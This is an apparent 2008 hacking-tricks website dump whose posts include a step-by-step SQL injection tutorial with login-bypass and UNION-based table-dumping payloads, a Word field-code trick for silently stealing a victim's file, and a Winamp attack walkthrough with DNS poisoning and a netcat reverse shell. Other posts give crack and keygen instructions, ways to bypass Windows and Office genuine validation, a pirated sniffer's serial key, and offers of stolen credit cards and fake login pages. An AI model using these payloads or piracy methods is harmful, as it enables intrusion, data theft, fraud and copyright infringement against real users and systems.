Allcomputertricks™® -Sanjiv - Recently Updated Pages

Allcomputertricks - home

sanjivnidamboor — Sun, 01 Mar 2009 03:39:20 CST

Celebrating 42, 000 hits (February 20th, 2008). Website was created on march 22, 2007. But was First edited on May 8th, 2007.

Allcomputertricks is now one year old! Thanks for your support...

Note: Most of the tricks are kinda old now, so we are uploading new tricks soon!!!

Allcomputertricks™®

Sanjiv Nidamboor

Computer Security Consultant

The world of computer stuff and hacking :-

Only at-

Allcomputertricks

We are 100% Spyware Free (tested) - Sanjiv

<<<Vote for Allcomputertricks here anytime, Please>>>

Donate your knowledge - Discuss, share, ask anything here

Need a professional email address- yourname@allcomputertricks.com?

Have any System/network problem?

Want instant traffic to your site? Add your site URL here. Traffic 100% guaranteed !

" We do not promote/sponsor Hacking in any form, rather this website will help you gain entry into the minds of seasoned computer criminals, so that you can forestall their attempts and pre-empty all harmful attacks, you will be hence well equipped to detect the ways in which hackers can infiltrate (Damage) your system.
The popularity of this site just blows my mind..": Allcomputertricks, Developed and maintained by Sanjiv.

Advertise with us, add your site URL

sanjivnidamboor — Sat, 15 Nov 2008 09:43:35 CST

Have a website or a blog? Want to increase its traffic, that too for free?!!? Don't worry, just fill in the form and I will accept it and put it here... And don't think that no one will visit your site! Am sure they are going to!

Add your comment below or if you don't want to share your email id in public, mail me

When you mail me or add your comment below make sure you type as follows:

And note that please do this only if you have started uploading articles on your blog/website...
My name: xyz
My Email id: xyz@xyz.com
My site URL: xyz.com
Site category: eg. Technology

Regards,
Sanjiv
Allcomputertricks

Submitted sites list:-

Name: Raj
Site URL: www.health-prism.com
Site category: Health
Submitted date - 27th January, 2008

Name: Michael beals
Site URL: http://virusearch.wetpaint.com
Site category: Computers and hacking
Submitted date - 17th February, 2008

Name: Shouvik
Site URL: http://gadgetfreek.wetpaint.com
Site category: Gadgets, reviews etc.
Submitted date - 31st March, 2008

Name: Shouvik Mukherjee
Site URL: htttp://www.gadgetfreek.myclanwebsite.com./
Site category: Computers & Gadgets
Submitted date - 17th april, 2008

Name: Raj
Site URL: www.primetimeeducation.com
Site category: Children magazines
Submitted date - 4th May, 2008

Name: Jawahar
Site URL: www.allmobiletricks.blogspot.com
Site category: Mobile stuff
Submitted date - 4th May, 2008

Name: Chad aka King Grimet
Site URL: http://politicalhostility.wordpress.com/
Site category: Political Blog
Submitted date - 24th, June 2008

Name: Honai
Email id: jhonai@gmail.com
Site URL: www.designernext.com
Site category: Internet
Submitted date : 16th July, 2008

Name: Livaty
Site URL: http://www.askacronym.com
Site category: Education
Submitted date : 17th, July 2008

Site URL : http://www.simple-earnpaisa.blogspot.com
Site category: Web hosting
Submitted date : 29th August 2008

Name: Basit Ali
Site URL: http://basitali.wetpaint.com
Site category : Hacking
Submitted date : 11th August, 2008

Name: Karthi

Email id : maddu_abc@yahoo.com

Site URL : http://learnpccore.blogspot.com

Site category: Technology
Submitted date : 04th September, 2008

Name: Himanshu Jain
Email id: admin@jbv.co.in
Site URL: jbv.co.in
Site category: eg. Education
Submitted date: September 6th, 2008

Name: XYZ
Email id: bshara95@live.com
Site URL: www.hackslife.wetpaint.com
Site category: hacks, batches, vbs, and tricks
Submitted date: October 14th, 2008

Name: buffriddler
Email id: buffriddler@googlemail.com
Site URL: http://galaxyofgardening.wetpaint.com/
Site category: anything and everything.
Submitted date: 13th November, 2008

Name: Sanjiv
Email id: sanjiv@allcomputertricks.com
Site URL:eminemisgod.4rumer.net
Site Category: Everything about Eminem and shady family!!!
Submitted date:15th November, 2008

Today There have been 112 visits (1023 hits) on this page!

Index

sanjivnidamboor — Sun, 10 Aug 2008 08:52:06 CDT

Give us a minute while we load it for u!

Know everything about computers only at:-
Allcomputertricks.com

Visit home page

Contact me
Contact me

Comment,suggest,request,complain,blog and some of the services that we provide

Hacking forums

Interesting articles for you

Batch virus

Batch programming

Batch programming tutorial made easy

Orkut tricks

Google stuff

Yahoo stuff

Yahoo stuff

Mobile hacking

Mobile service codes

Mobile service codes

Nokia codes

How to not get hacked

how to not get hacked
- Proxy???its all here

Social engineering explained

Free downloads. Section Updated "Good collection"

Trojan explained here!

Trojan Trojan!!explained here
- Trojan explanation part 1

Xp tricks

Xp registry tricks

Some notepad tricks
Remove brontok viruses urself
Windows essential bundle
All run commands
Make your windows genuine
- Genuine windows activation - NEW Activation key Uploaded !
- Windows Media player 11
- Make windows original
My favorite 100 Xp tricks an hacks

Xp and internet tricks

Donate your knowledge!

Discuss and share anything related to computers! Also donate your knowledge

Real hacking stuff

Real hacking stuff

Internet hacking articles

Get ur unique msn account for free

Windows Xp hacking

Whats new on the internet?

Whats new on internet

10 minute mail

Top 10 best hacks ever

Fake login pages
- All fake login pages are here

Bring instant traffic to your site!

Bring instant traffic to your site for free!

Announcements and offers

Announcements and offers

Be our Site's V.I.P. member

Be an allcomputertricks V.I.P. member !

Tutorials on hacking etc etc...

User Testimonials

Testimonials for Allcomputertricks

Tutorials

sanjivnidamboor — Sun, 10 Aug 2008 08:46:29 CDT

Here I will be providing you tutorials on various things, like; Computers, hacking, virus, Trojans, developing websites, cracking, all programming tutorials, html, javascript, visual basic etc. Keep checking this section..

How to Convert Computer into a server..!!

sanjivnidamboor — Sun, 10 Aug 2008 08:44:33 CDT

This trick is for Router UT-300R2U users..!!!

1... Install Xampp [http://www.apachefriends.org/en/xampp.html]..Make sure that u Check the Apache as service Box..!!!

2... Now once installed Goto http://192.168.1.2

3... Goto Adanced tab > Virtual server..in Privet IP type -
Private IP: 192.168.1.3
Local Port: 80
Destination Port From: any port

4.. Click apply

5.. Now to tools > misc. and click save and reboot ..

Hurray ur computer has converted into server now just get ur ip from whatismyip.com and shre it..!!

Since most BSNL users have dynamic ip goto www.no-ip.org to get the solution..!!

Note: WHen u will try to open the page u will get Router Page but when other will do it they will get ur Apache page

PS: this trick wont work if u r using Port Forwarding for torrents..!!

Make Your Own Copy-Protected CD

sanjivnidamboor — Fri, 25 Jul 2008 04:29:34 CDT

Burn the modified image to create a copy-protected CD

Insert a blank CD and start CloneCD again. Click the “Write From Image File” button. Select the image file you modified in step 4 and click next. Select your CD recorder and click Next. Select “Multimedia Audio CD” and click OK to begin burning.

That’s it! You’ve created your very own copy-protected CD.

Now it’s time to test your disc. If everything worked, the files from the data session will be visible from My Computer, but the audio tracks will not appear in Windows Media Player, i Tunes, and most other mainstream music players. The CD should play correctly in standalone CD players.

Yahoo messenger hack

sanjivnidamboor — Fri, 27 Jun 2008 10:56:46 CDT

This is a small application named yahoochecker

what it does that it sniff the messenger packets in your network and you may be able to see all the messages coming to a particular ip address in your network.

but the problem is that I couldn't found the key/crack of it so its a demo version only

But the serial key for the full version is :

key : 4BE6183BB5841628

download link:

http://rapidshare.com/files/124893177/yahoochecker.exe.html

here is the new version with keygen:

http://rs128.rapidshare.com/files/33957234/YahooMonitor.v3.0.rar

Real Hacking stuff

sanjivnidamboor — Fri, 27 Jun 2008 10:55:50 CDT

Contents of real hacking stuff

Spy phishing

Ip address explanation continued

Other smart ways to Bypass the Windows genuine advantage Validation

Really Interesting Articles

sanjivnidamboor — Fri, 27 Jun 2008 10:53:26 CDT

Interesting articles - Contents

Batch programming

Batch programming tutorial simplified

Applying cracks and patches

sanjivnidamboor — Fri, 27 Jun 2008 10:48:15 CDT

This tut will be helpful to apply cracks or find cracks

Here are a few steps you might find useful when finding a crack:

1. Scan whatever you d/l for trojans or viruses.
2. If you find that there are two cracks in a zip, check the date 'cause most of the time the oldest is a Trojan.
3. When it's called: "crack.exe" beware and read the .nfo first 'cause that might be a Trojan and the serial is in the .nfo.
4. Once you have extracted something, scan it again to make sure.
5. When you read the .nfo, there is normally the explanation how to apply: the crack/patch/cracked.exe/keygen or serial.
.nfo's can be opened with notepad
6. You can rename everything, except a cracked.exe
7. When you apply a crack or registrar a serial, try to disconnect from the internet so you'll know if it phones home to check or not.

--------------------------------------------------------------------------

When you want to apply any of the 5 different methods do it as follows:

a) Crack or Patch:

1. Make sure that the program is closed and doesn't start up with Windows.
2. Disconnect from the internet (this doesn't always work).
3. If there is an option to create a backup then make sure you take it, so if something goes wrong you can just roll back to the earlier state.
4. Browse to the program directory or place the crack into that directory and click ok or apply(Double click the crack and/or press "apply crack").
5. Restart your PC and you're done.

B) Cracked.exe:

1. Whatever you d/l read the .nfo so you'll know if you're dealing with a crack or cracked.exe.
2. There could be multiple cracked.exe files you have to apply, so if there are three beware of the Trojans. Again check the date.
3. Close the program that needs to be cracked before you do anything else.
4. Disconnect from the internet.
5. If you're not sure the one you have to replace with the cracked.exe is the correct one, then it's best that you move the original to another folder first so they are not overwritten. If something goes wrong you can just place them back.
6. Move or copy the Cracked.exe to whatever directory is stated in the .nfo.
7. Restart your pc and you're done.

c) Keygens or Serials:

1. Scan it for trojans again.
2. Doubleclick the keygen and hit generate.
3. Copy the serial it generates and minimize the keygen.
4. Disconnect from the internet (this doesn't allways work).
5. Install or open the program and search for the "About"-tab and look for something to registrate and open the menu.
6. Paste or type in the serial and registrar the program.
7. Restart your pc and you're done.

Patch: -
This is a little program that reverse the protection of the target software. Patches are often named: "crack.exe", "patch.exe", "softwarename_patch.exe" or "teamname.exe". The patch aims to the main *.EXE of the target software or to a *.DLL. You should know that the patch have to be applied to the exact software version it have been created for. The patch, generally will force you to apply it to the file it aims.

Keygen - A little program that generates valid serial numbers under your name. What to say more on keygens? Just download the same version it have been build for. Often they will work on other versions too if the software publisher have not changed the serial generating routine. Keygens are often named: "keygen.exe" or "softwarename_keygen.exe".

Serial Inside The *.NFO - One or more serial keys inside *.NFO file. For more info on NFO files read below.

Already Cracked File - A cracked file that you should replace with the original one inside target installation directory. After replacing, the software should be registered. This kind of crack is named: "softwarename.exe".

Loader - This runs the target software as registered copy or stops the trial time. You should always put this file inside the target installation directory. This crack is often named: "loader.exe" or "softwarename_loader.exe".

Registry Entry *.REG - Adds registration information to your windows registry and register automatically the target software. Double click on it and accept to add the info
.
About *.NFO files - An important thing to know is how to use the *.NFO file. Inside any crack archive you will find a file with the *.NFO extension. This file is often named "teamname.NFO". How to use it? You should not double click on it coz this will open the system info utility. To view this file contents, drag and drop it inside a Notepad blank file or rename the file from "NFO" to "TXT" and double click on it. To view the "NFO" as it is supposed to be viewed download a "NFO viewer".

Misrepresentation of site names!!

sanjivnidamboor — Fri, 27 Jun 2008 10:43:00 CDT

The top dot com naming misreads!
~~~~~~~~~~~~~~~~~~~~~~

Looks like these Companies that didn't spend quite enough time considering how their online names might appear .. and be misread.

These are not made up. Check them out yourself! Read the web-sites names closely!

1. "Who Represents" is where you can find the name of the agent that represents any celebrity. Their Web site is www.whorepresents.com
Misread by many as "whore presents" do we need to say more!

2 . Experts Exchange is a very popular knowledge base where programmers can exchange
advice and views at its urls is www.expertsexchange.com
Misread by many as "experts sex change".com

3. Looking for a pen? Look no further than Pen Island at www.penisland.net
I wont go in the details about the above one.

4. Need a therapist? Try Therapist Finder at www.therapistfinder.com
when you look carefully it looks like "the rapist finder".com

5. There's the Italian Power Generator company, www.powergenitalia.com
I Wont get into details about the above, but I am sure you can figure it out!

6. And don't forget the Mole Station Native Nursery in New South Wales, www.molestationnursery.com
Misread as "molestation nursery".com

7. If you're looking for IP computer software, there's always www.ipanywhere.com
I read it as "I P anywhere" you see what i mean

8. The First Cumming Methodist Church Web site is www.cummingfirst.com
All I can say ouch!

9. And the designers at Speed of Art await you at their wacky Web site www.speedofart.com
I misread it as "speed of fart".com

Introduction to SQL injection

sanjivnidamboor — Tue, 17 Jun 2008 05:14:36 CDT

Abstract
SQL Injection
is the process of corrupting the information sent between a page and a
database. This process can result in arbitrary SQL code execution, and
possibly even the compromising of a server as was done in the famous
apache.org hack which resulted from the SQL server running on root
permissions.

What on earth is SQL?
SQL stands for
Sructured Query Language. What does this mean? A query is used to
communicate with a database. Whether it be to insert new information,
extract necessary information, update information, or delete
information, a query is necessary to accomplish the transaction.
Therefor a structured query languages provides a standard for commands
to interact with a database.

Where are queries used?
Queries
are used any time a page has to check information against something
stored in a database. For example, anytime you log into your account
here on the forums, a query is formed which checks the username and
password you entered, to see if they match any pairs in the database.
Almost any time you interact with a form on the internet, at least one
query is usually involved.

What do queries look like?
Queries
are generally comprised of 4 common types. These types are SELECT,
UPDATE, INSERT and DELETE statements. As there names imply, they handle
the different functions associated with the database, for example, a
login script would look something like this:

CODESELECT * FROM `users` WHERE username = 'THE USERNAME YOU ENTERED' && `password` = 'THE PASSWORD YOU ENTERED';

In
this case, there is a table in our database named users which as we
would expect, holds user information. what this does is return any row
where the username field in the table matches your input to username,
and the password matches your password input. If a row is returned,
there was success, if not, the login information was incorrect.

How is this exploited?
If
you've read my previous article, it's probably becoming clear to you
that web hacking often focuses around the fact that programmers do not
quarantine and filter the data which they should. As you've seen in the
previous SQL statement, the data you enter is directly inserted to the
query. This, once again, is how we exploit a vulnerability and inject
our own SQL code. So enough jibber-jabbering, and let's take a look at
an injection.

Simple SQL Injection Example
Let's stick
with our user login system example here. As with most login systems,
our will ask for a username and password, then check it against a
database.
Let's watch what happens when we enter unexpected data that we shouldn't be entering.
For the username we enter:

Code:

' OR '1'='1

and for the password we enter:

Code:

' OR '1'='1

Now
at this moment, you might think this is extremely strange, and I would
agree with you, but lets watch what happens when it gets put into the
form of a query:

CODESELECT * FROM `users` WHERE username = '' OR '1'='1' && `password` = '' OR '1'='1'

Ahh,
very interesting. For those of you who have taken some simple algebra
courses, they usually cover AND and OR logic. What happens here is it
checks for a field where the username is equal to 'nothing' (what we
put in was '') OR where '1'='1' since one ALWAYS equals one, this check
passes. Same goes for password, we check for a location where password
= '' (nothing) which it wont, OR '1' = '1' which will make the second
check pass.

Now you might be asking, well, if it's checking
usernames against nothing and passwords against nothing, which account
will you be logged in to once the check passes?

Generally speaking, the script will return the first row from the database (usually an administrator account as an added bonus)

How to access a particular account
Well,
that's all well and good, but how to access a particular account you
have an interest in this way? Simply change the username field to the
desired username and leave the password as the injection code. That
way, the script will first check that there is a username in the
database that matches yours (hopefully if you're trying to get into a
particular account it actually exists :tongue and secondly, will
check if that password equals '' (which it wont) OR if 1=1 which it
will, and you should be logged in as that particular user.

Error Generating
Error
generating is an important part of SQL injections. All parameters of a
script must be tested to see if you may be able to cause a syntax
error. Some good techniques for generating errors are adding a single '
to mismatch the quote count, adding things like a legitimate value with
quotes added, such as value' or 'value adding OR statements with
nothing after them such as value' OR or value OR.

Other good ways are to add a semi colon (which is the terminating character in an SQL statement)

Also,
another very good technique in generating errors in pages which use the
INSERT statement. by adding commas, you can throw off the column count
for example if you were to input: value,value,value you could generate
a column count mismatch.

Any form of SQL syntax error is a good sign which may lead to a successful injection.

Methods Of Injection
Well,
at this point you may be thinking, "Well, this is all well and good,
but how do i actually use this stuff?" Don't fret, information is on
the way.

An extremely common method of injection is the end of a
url which receives data via the GET protocol and uses it to query the
database for information.

If you have read my previous article
on XSS, I've mentioned the GET protocol previously and you can skip
this. For those who haven't or who forgot, the GET protocol is used to
supply data to a PHP page for processing. Whenever you see a question
mark (?) on the end of a url like this:

Code:

http://example.com/userprofile.php?id=1

This
means that an id with the value of 1 is being supplied to the page.
This is used very often for user profile pages as i have used in this
example. What then happens is that id will be used in a query such as
this:

CODESELECT * FROM `user_information` WHERE `id` = 'THE ID SUPPLIED TO THE PAGE'

As
discussed earlier, if this information is not filtered, we will have a
prime target for injection. Attempt a few of the injection testing
techniques discussed earlier, if you generate an error this script is
vulnerable to SQL injections.

Another method of injection are
the ever-vulnerable form fields. Test these techniques on any and all
form fields on a page, keep trying and hopefully you will stumble
across a nice error.

NOTE: Many times, administrators will
forget to check values that come from things like select boxes, or
check boxes as they think they will only be from the expected values.
However, these values are easily changed. They can be changed through
several means, you can google for some techniques or request a tutorial
in my thread.

Table Enumeration
Table name and column
enumeration is also a very important part of SQL injections. Generating
errors is fine, but if you can't figure out column and table names it
will likely do you no good.

The method of extracting table names
and column names depends upon which sql server is being run. The most
common sql server i have come across is running MySQL, so I will focus
on that, but with a little research the information can be adapted to
other types.

The interesting tables you're looking for in this
case are stored in the system tables INFORMATION_SCHEMA.TABLES and
INFORMATION_SCHEMA.COLUMNS respectively.

What we can do is what is called a UNION ALL which will merge the results from one query with those from another.

One
of the pitfalls of UNION ALL is the fact that it must return the same
number of columns as the first query, and data of the same type. So for
example imagine this query.

CODESELECT username, password, email, socialsecurity, phonenumber FROM `users` WHERE `id` = '234'

In
order to inject a UNION here you would need to be selecting 5 values as
well, most likely 3 strings (words) and 2 integer (number) values.

An
easy way to get around the data type necessity is to select NULL (which
means nothing) and select what you need in the correct place.

Unfortunately,
the way to determine the quantity to select and which field will be
selecting a string (words) which you need since table and column names
are strings. A union query will usually start out with one field added
like this as your input:

CODEhttp://example.com/userprofile.php?id=234' UNION SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE '1' = '1

Which will result in the query from before being changed to:

CODESELECT
username, password, email, socialsecurity, phonenumber FROM `users`
WHERE `id` = '234' UNION SELECT TABLE_NAME FROM
INFORMATION_SCHEMA.TABLES WHERE '1' = '1'

As we can tell
from this, this query will fail because the UNION selects one field
while the original query selects five. We can use trial and error to
determine how many fields are being selected. (Since as hackers, we
cannot generally see the actual SQL code being executed)

eventually through trial and error (or through an educated guess: read below) we will end up with an injection like this:

CODEhttp://example.com/userprofile.php?id=234'
UNION SELECT TABLE_NAME, NULL, NULL, NULL, NULL FROM
INFORMATION_SCHEMA.TABLES WHERE '1' = '1

Which will now
select the same amount of fields as the original query. However, this
only selects the FIRST table in the information schema, which may not
be the one we're looking for.

SIDE NOTE: Educated
guessing is a good way to determine how many fields are being selected.
For example, if there is a system which allows you to input a username
and it retrieves his id, email, and phone number and displays it to
you, it would be a good bet to start with 3 (id, email, phone number as
3 separate fields means you should attempt to select 3 as a good
starting place as well) This wont always work because sometimes
webmasters do strange things and select values they don't use (or use
but do not display)

Let's say the first table name you've found
is called example1 you can apppend to the WHERE query using 'not in'
command which means it cannot be from anything in the list supplied to
the clause. To make sure it doesnt select example1 again this time, we
add it like this:

CODEhttp://example.com/userprofile.php?id=234'
UNION SELECT TABLE_NAME, NULL, NULL, NULL, NULL FROM
INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN ('example1') AND '1'
= '1

Let's say this time it selects example2 and we still don't want that, just add it to your list.

CODEhttp://example.com/userprofile.php?id=234'
UNION SELECT TABLE_NAME, NULL, NULL, NULL, NULL FROM
INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN ('example1',
'example2') AND '1' = '1

Ahh great, let's say for sake of
argument it returns something like admin_users table this time. Great!
we now have a table name we can definitely use.

The way the
columns work is that they are linked by table name, so once we have
that, we can work the same way to find out all column names like so:

CODEhttp://example.com/userprofile.php?id=234'
UNION SELECT COLUMN_NAME, NULL, NULL, NULL, NULL FROM
INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = 'the_table_name

From
here on out we can do the same working with NOT IN as we did before to
find all the table names we want, after that it's a simple union select
from the table and the information we want is ours.

CODEhttp://example.com/userprofile.php?id=234'
UNION SELECT column1, column2, column3, column4, column5 FROM
table_name_we_found WHERE '1' = '1

NOTE: This example
assumes you want to select 5 columns from one table and that they are
of matching types to the original SELECT. The five columns are just
examples of the column names you might have come across

Blind SQL Injection
Blind
SQL Injection refers to SQL injection without the ability to read error
messages from the database. To sum it up, a user must work off whether
the script returns an admin-defined error message or if it runs
successfully. If it runs successfully, yet you've injected some code,
the script is succeptible to SQL injection even though you can't see
it's error messages. Further examination of this topic is beyond the
scope of this introductory article, but with requests I will gladly
write one in the future.

Conclusion
Remember to comment if any doubt, suggestion etc! Thanks ;)

-Sanjiv Nidamboor (Site Admin)
Allcomputertricks.com

Announcements and Offers

sanjivnidamboor — Thu, 05 Jun 2008 03:19:26 CDT

Allcomputertricks is now one year old... thanks for your support people! :)
Domain changed to www.allcomputertricks.com

Any announcement or news related to this site will be put up here by me only.. So keep checking for new offers etc.

Keep checking for new offers here, as this section gets updated quiet often! Yes, we keep giving offers to our visitors every month. And at least 10 people win something or the other every month !

Choose any of these offers:

Offers

Want a software in which you can add anyone in yahoo messenger without permission? U can also delete yourself from your friends yahoo account without his permission! You can get it here for sure.

Now you can get full version of full_speedv2 (which can increase your surfing and downloading speed… as you people used trial version, you came to know that this software works 100%

You can get any software, professional software, crack, serial.. I mean anything you need!

You can get your personalized email id! Example - yourname@allcomputertricks.com. but before choosing this offer please make sure you read this.

All for contributing something for this site and of course the content should be related to Computers & Internet. It can also be hacking too , I don't mind.

:::Rules:::

You should not contribute the same stuff which is already there! If you do so, you won't get anything...

Even your friends can help you for contributing if they have the skills needed

You can even choose multiple offers

Rules will be updated when needed...

:::Some facts:::

No other websites really give these kinda offers. But we do give as people will keep on visiting this site and try to contribute their skills... Its almost like giving donations in form of money.

We don't need money to keep this site running. All we want is your hacking skills. We don't mind if you copy something from any other site and give them to us. But while doing this, make sure you give proper credits as we do!

If you keep on contributing and if we like it, we will give you all the V.I.P. access i.e. real hacking stuff, premium accounts, credit cards, etc.

-Sanjiv

Allcomputertricks

Mobile hacking

sanjivnidamboor — Wed, 04 Jun 2008 05:34:04 CDT

Mobile hacking

Hacking airtel live - easy trick

Mobile service codes

Mobile service codes

Nokia codes

Microsoft office hacks

sanjivnidamboor — Wed, 04 Jun 2008 05:28:03 CDT

This article is just to make you aware of known existing threats..
only for educational purpose.

I have stumbled onto a couple potential security issue in Microsoft
Word blogs i would like to share. In both cases the adversary (mis)uses
fields to perpetrate the attack. It's important to note that fields are not macros and, as far
as I know, cannot be disabled by the user. I am providing a basic
description along with a proof-of-concept demo. Itsfairly certain
that someone with free time and imagination can expand on these
principles, possibly applying them to other products.

Following tradition I'll use Hacker and Victim as the two parties involved.
Hacker will be the adversary.

1) Document collaboration spyware.

Attack Basics: Hacker sends Victim a Word document for revisions. After Victim
edits, saves, and mails it back to Hacker the file will also include
contents of another file(s) from Victim's computer that Hacker has
specified a priori. To achieve this, Hacker embeds the INCLUDETEXT field
into the document. The field results in inclusion of a specified file
into the current document. Of course, Hacker must be careful include it
in such a way that it does not become apparent to Victim. Hacker can do all
the usual things like hidden text, small white font, etc. Alternatively
(and in my opinion cleaner, she can embed the INCLUDETEXT field within
a dummy IF field that always returns an empty string. In this case, the
only way Victim can notice the included file is if he goes browsing
through field codes.

Attack Improvements: The disadvantage of the basic attack is that Hacker
must rely on Victim to update the INCLUDETEXT field to import the file. If
the document is large and contains tables of contents, figures, etc.
then Victim is very likely to update all the fields. However, Hacker would
like to make sure that the field gets updated regardless of whether Victim
does it manually or not. Automatic updates can be forced if a DATE
field is embedded into the INCLUDETEXT and it is the last date field in
the document (don't ask me why).

Proof of concept: Inserting the following field structure into the
footer of the last page will steal the contents of c:a.txt on the
target's computer. Keep in mind the plain curly braces below must
actually be replaced with Word field braces (you can either use the
menus to insert fields one by one, or ask google how to do it by hand).

{ IF { INCLUDETEXT { IF { DATE } = { DATE } "c:\a.txt" "c:\a.txt" } * MERGEFORMAT } = "" "" * MERGEFORMAT }

Countermeasures: The only thing you can do now is decide how paranoid
you want to be. If you must edit and send out a Word file with unknown
origins, you may want to manually go through the fields. It would be
nice to be able to force user confirmation (via a dialog box) for all
includes. Alternatively one could write a scanner. Of course an optional
standalone checker will never be used by those most at risk.

2) Oblivious signing

Attack Basics: Hacker and Victim wants to sign a contract saying that Hacker
will pay Victim $100. Hacker types it up as a Word document and both
digitally sign it. In a few days Victim comes to Hacker to collect his
money. To his surprise, Hacker presents him with a Word document that
states he owes her $100. Hacker also has a valid signature from Victim for
the new document. In fact, it is the exact same signature as for the
contract Victim remembers signing and, to Victim's great amazement, the two
Word documents are actually identical in hex. What Hacker did was insert
an IF field that branched on an external input such as date or
filename. Thus even though the sign contents remained the same, the
displayed contents changed because they were partially dependent on
unsigned inputs. The basic point is that very few users know the actual
contents of their Word documents and it should be obvious that one
should never sign what one cannot read. Of course, Victim could contest
the contract in court. An expert witness (that's actually an expert)
could easily demonstrate that there are unsigned inputs and therefore
it is not clear which version was actually signed. Thus Victim can get out
of the fraudulent contract. However, the same logic will hold for Hacker
and she gets away without paying Victim $100 she signed for. Thus, an
adversary can build in a free escape clause. Note that I am just
speculating about all the legal aspects.

Proof of concept: Inserting the following field structure at the tail
of the document will cause "Hello" to be displayed if the filename is
"a.doc" and "Bye" otherwise.

{ IF { FILENAME * MERGEFORMAT { DATE } } = "a.doc" "Hello" "Bye" * MERGEFORMAT }

Update : this flaw has been fixed in office 2003 onwards
but still works in office 2000 and even sometimes in 2002/03

__________________________________________________________________________

We can
consistently crash Word 2000 using the following method:

1) Open up any text/document editor such as notepad or wordpad
2) type a single word (must be a known word, no punctuation).
3) highlight the whole word and CTRL+C
4) launch word 2000
5) CTRL+V
6) press HOME to take you to the start of the line
7) type I
8) hit the space bar

This consistenly crashes Word 2000 with the following error
message:

DDE Server Window: WINWORD.EXE - Application Error
The instruction at "0x3076a63e" referenced memory at "0x00000000". The
memory could not be "read".

Vulnerability:

remove office passwords
Vulnerable:

MS Word (Win2K/XP)

Example 1

1) Open MS Word with a new/blank page

2) Now select "Insert" >> "File" >> browse for your password protected doc & select "Insert" & "Insert" password protected doc into your new/blank doc

3) Now select "Tools" & hey, there's no longer an "Unprotect document" ... password vanished ...

Example 2

1) open your password protected doc in MS Word i.e. you can't edit protected fields (apparently)

2) Save as a Rich Text Format (RTF) & keep this RTF file open in MS Word (YES, keep open)

3) Whilst your new RTF file is open in MS Word, go "File open" & find your newly saved RTF file & open (YES, you DO need to do 'tis even though you already have it open)

4) If prompted to revert say YES, if not prompted stay calm. Now in your MS Word menu go & "Unprotect document", amazingly, voila, you don't get prompted for a password

Change password if you like & or save in whatever format if ya like ...

How to hack through winamp

sanjivnidamboor — Wed, 04 Jun 2008 05:24:32 CDT

How Hackers Take over Through Winamp!!

Winamp has an option, enabled by default, which checks on startup for
the latest version from www.winamp.com and will then notify the user of
a possible upgrade via messagebox..

Unfortunately, if it were to receive a huge response, the thread
parsing the data is thrown into an infinite loop and eventually the
exception dispatcher is called.. and then like most of the time under
windows, a big, bad, overflow occurs.. i am attaching the real example

Sample attack

=============

Nameserver - 192.168.0.1

attacker - 192.168.1.2

victim (windows machine) - 192.168.0.2

1) attacker poisons nameserver cache

192.168.1.2:

x@x:~$ ./p0ison 192.168.0.1 www.winamp.com 192.168.1.2

2) victim is now resolving www.winamp.com to attacker machine

192.168.0.2:

C:>nslookup www.winamp.com

Server: z3.names.int

Address: 192.168.0.1

Name: www.winamp.com

Address: 192.168.1.2

3) attacker fires up exploit as web daemon

192.168.1.2:

x@x:~$ (./wampexp 192.168.1.2 5555)|nc -l -p 80

4) attacker waits for connect-back by exploit

192.168.1.2:

x@x:~$ nc -l -p 5555

5) foolish winamp user opens winamp!

192.168.0.2:

opens winamp, prepares for The Weather Girls - It\'s

Raining Men.mp3

6) BOOJAH!@

192.168.1.2:

x@x:~$ nc -l -p 5555

Microsoft Windows 2000 [Version 5.00.2195]

(C) Copyright 1985-2000 Microsoft Corp.

C:>

/// control over machine taken

Other smart ways to Bypass the Windows genuine advantage Validation

sanjivnidamboor — Wed, 04 Jun 2008 05:21:29 CDT

Check out some smart ways Too!

Select the Office version from the above link and try downloading any updates / add-ins related to that
specific version. It will lead to a validation link (Refer the screenshot below) which will check whether the office
installed in the system is genuine or not. In short the OGA validation generates a hash out of information
gathered from the installed MS Office and passes it on to the server for verification. The user will be
directed to the download link only if the installed office version is genuine.
To defeat such validation, follow the extremely simple steps –
- Select the add-ins / updates that you require for office
- In the Validation required page, copy the file name

Use google and search for the filename using the following search keyword combination:
site:download.microsoft.com/download <File Name>
For Example: To search for the file name “RedactionSetup.msi” use the following search key
combination site:download.microsoft.com/download RedactionSetup.msi
- The above search result spits the direct link to the file available on the Microsoft download server
which can be used to directly download the file without any validation check (Refer the screenshot
below for details).

It is possible to re-use the hash generated in any machine having genuine copy of MS Office and can be
distributed over the internet.
For example – The table below has hashes for downloading rhdtool.exe and RedactionSetup.msi which can be
re-used by any user having pirated copy of Office to defeat OGA validation check.
http://www.microsoft.com/downloads/details.aspx?FamilyID=144E54ED-D43E-42CA-BC7B-
5446D34E5360&displaylang=en&Hash=[Put the hash here]

Method 3: A Quick Analysis of OGACheckControl.dll
Last but not the least is analyzing OGACheckControl.dll and preparing a patch. However just to keep
myself away from those scary legal notices, I do not want to release any patch at this point of time. I did a
quick reverse analysis while I was about to finish my last latte; below are few interesting sections which one
may like to look at without wasting much of time -
a. Creation of Hash -> Hashing the stream of data and computation of cryptographic hash of a stream of data

Leave a comment if you wanna know more about it!

Bypass windows validation

sanjivnidamboor — Wed, 04 Jun 2008 05:16:35 CDT

Disclaimer : This article is for educational Purpose only

Microsoft WGA validation check can be defeated and any Microsoft product with the WGA validation feature can be run and installed on machines running pirated copy of Windows XP. To bypass WGA validation check, one can run “GenuineCheck.exe” file on a machine running a copy of an authentic Windows XP for generating a key code. This key code generated on the machine running genuine copy of Win XP can be used to circumvent the WGA check on the machine running a pirated copy of Win XP.

Below given are the steps to defeat WGA validation check on a pirated copy of Win XP –

Click here for smart ways to bypass Windows Validation

Case Study – Download and Install Windows AntiSpyware on a pirated copy of Windows XP

Steps for Bypassing WGA Validation Check

Visit the Microsoft download link to download a copy of Windows Anti-Spyware.

After clicking on the “Windows Anti-Spyware” link in the download section the following screen will appear with a “Continue” button in it. Click on the “Continue” button to go to the next screen.

The screenshot below is the next screen that appears after step 2. Select the first option and click on the “Continue” button.

The screenshot below is the next screen that appears after Step 3. Scroll down to the “Alternative Validation Section” and click on the link “Genuine Windows Validation, Alternate Method”.

The following page appears after clicking on the “Genuine Windows Validation, Alternate Method” link. To download a copy of “GenuineCheck.exe”, click on the “Continue” button.

